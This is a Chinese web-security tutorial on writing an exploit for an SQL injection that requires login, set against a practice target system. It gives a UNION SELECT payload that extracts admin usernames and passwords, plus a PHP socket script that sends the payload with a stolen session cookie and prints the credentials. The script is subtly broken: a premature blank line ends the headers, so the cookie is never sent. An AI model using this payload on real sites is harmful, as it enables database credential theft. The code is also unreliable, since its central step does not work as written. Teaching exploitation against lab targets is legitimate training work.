[原创]WEB安全第七章 exp编写篇05 需要验证的exp编写

WEB安全第七章 exp编写篇05 需要验证的exp编写

前四篇的内容都是使用payload 直接访问攻击页面，而且不需要权限认证，能直接使用exp实现攻击。
如果需要登录认证 如 登录后方可访问漏洞页面，像这种需要权限认证的漏洞页面，在平时测试也是非常的多，这节就来细说这种exp如何编写。
访问暗月靶机测试系统 帐号和密码分别为 moon 123456
http://www.moontester.com/

登录访问->登录后->文章列表

id=1 是存在SQL注入的,以下是测试的payload语句。
-1 union select 1,2,group_concat(0x7e,username,0x3a,password,0x7e) from admin

如果不登录的情况下直接访问url 页面是会返回 登录后再进行访问 这种情况下编写exp同样是返回 登录后再进行访问。

这种情况如何处理？

1、首先要理解 用户登录验证是通过 SESSION_ID 做判断的,无论是那种网页程序 asp aspx php java都是一样的。

以暗月靶机系统为列 ，访问网页的时候 系统会分配一个唯一的SEESION_ID给你的浏览器，主要是表现在http头信息，没特别的设置的时候，关闭浏览器这个文件头信息就会消失。

2、用户登录成功后会在SESSION里生成判断的key 通过这个key验证是否登录。
登录成功后系统就会王gpcjcspj2oje5j3h2dtb8c8895这个文件里面写入内容，具体看这个部分的代码

$_SESSION[‘name’]=$usernme;
在linux 下面查找seesion的命令
find / -name **gpcjcspj2oje5j3h2dtb8c8895
登录成功后查看文件里就会存在moon

遇到有权限认证的页面 就可以通过登录后的session 再提交数据的时候也提交就可以了。

详细代码

[php]
详细代码
<?php
$site="www.moontester.com";
$payload="article.php?id=-1%20union%20select%201,2,group_concat(0x7e,username,0x3a,password,0x7e)%20from%20admin";
$key ="PHPSESSID=gpcjcspj2oje5j3h2dtb8c8895";

function send_http($site,$payload,$key){
$fp = fsockopen($site, 80, $errno, $errstr, 30);
if (!$fp) {
echo "$errstr ($errno)<br />\n";
} else {
$out = "GET /{$payload} HTTP/1.1\r\n";
$out .= "Host:{$site} \r\n";
$out .= "Connection: keep-alive\r\n\r\n";
$out .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$out .="Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\n";
$out .="Cookie:{$key}\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$resp .= fgets($fp, 1024);
}
fclose($fp);
return $resp;
}

}

$html = send_http($site,$payload,$key);

if($html){
preg_match(‘/~(.*?)~/’, $html,$m);
if($m[1]){
echo "[+]{$m[1]}[+]";
}else{
echo "[!]error[!]";
}

}else{
echo "[!]error[!]";
}

[/php]

登录后的session
$key =”PHPSESSID=gpcjcspj2oje5j3h2dtb8c8895″;

利用语句
$payload=”article.php?id=-1%20union%20select%201,2,group_concat(0x7e,username,0x3a,password,0x7e)%20from%20admin”;
send_http发送包的函数
运行如图